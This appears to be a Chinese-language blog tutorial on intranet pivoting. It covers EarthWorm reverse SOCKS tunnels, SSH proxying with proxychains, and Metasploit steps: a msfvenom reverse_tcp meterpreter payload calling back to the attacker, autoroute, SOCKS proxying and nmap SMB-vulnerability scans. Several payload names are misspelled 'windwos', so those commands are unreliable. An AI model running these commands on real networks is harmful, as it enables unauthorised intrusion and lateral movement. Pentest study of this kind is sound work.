当前位置: 首页 > news >正文

内网安全-内网穿透

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透


内网渗透

Nc使用详解
Nc监听和探测


Nc传文件


termite内网穿透工具


1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:./ew_for_linux64 -s rcsocks -l 1111 -e 2222#将1111端口监听到的本地数据转发到 web服务器的2222端口# 通过1111端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 10003、windows和linux差不多!

ssh代理内网穿透




正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!

ssh配置socket代理


1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081代理完成之后就可以使用本地流量进行内网信息收集了

MSF多级网络穿透


1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!
http://www.lryc.cn/news/297931.html

相关文章:

  • 【Make编译控制 01】程序编译与执行
  • MySQL如何定位慢查询
  • npm 上传一个自己的应用(4) 更新自己上传到NPM中的工具版本 并进行内容修改
  • Linux开发:PAM1 介绍
  • Leetcode 3036. Number of Subarrays That Match a Pattern II
  • 华为环网双机接入IPTV网络部署案例
  • “智能检测,精准把控。温湿度检测系统,为您的生活带来全方位的健康保障。”#非标协议项目【上】
  • 牛客网SQL进阶137:第二快/慢用时之差大于试卷时长一半的试卷
  • CVE-2022-0760 漏洞复现
  • WordPress突然后台无法管理问题
  • STM32F1 - 标准外设库_规范
  • 推荐系统|召回04_离散特征处理
  • 一个查看armv8系统寄存器-值-含义的方式
  • LLMs之miqu-1-70b:miqu-1-70b的简介、安装和使用方法、案例应用之详细攻略
  • npm 下载报错
  • GPT-4登场:多模态能力革新,提升ChatGPT与必应体验,开放API助力游戏革新
  • 【芯片设计- RTL 数字逻辑设计入门 11.1 -- 状态机实现 移位运算与乘法 1】
  • MongoDB系列:管道操作:聚合阶段操作符(二)
  • C++ //练习 5.12 修改统计元音字母的程序,使其能统计以下含有两个字符的字符序列的数量:ff、fl和fi。
  • C语言-----自定义类型-----结构体枚举联合
  • elasticsearch下载及可视化工具下载使用
  • vim常用命令以及配置文件
  • 2024年的VUE2下的无效指令npm install --save vue-i18n
  • 计算机视觉主要知识点
  • python 基础知识点(蓝桥杯python科目个人复习计划35)
  • 使用HTML、CSS和JavaScript来创建一个粒子效果,粒子会跟随鼠标点击位置生成
  • 优质项目追踪平台一览:助力项目管理与监控
  • Docker下安装GitLab
  • 2024/2最新升级ChatGPT Plus的方法
  • github和gitee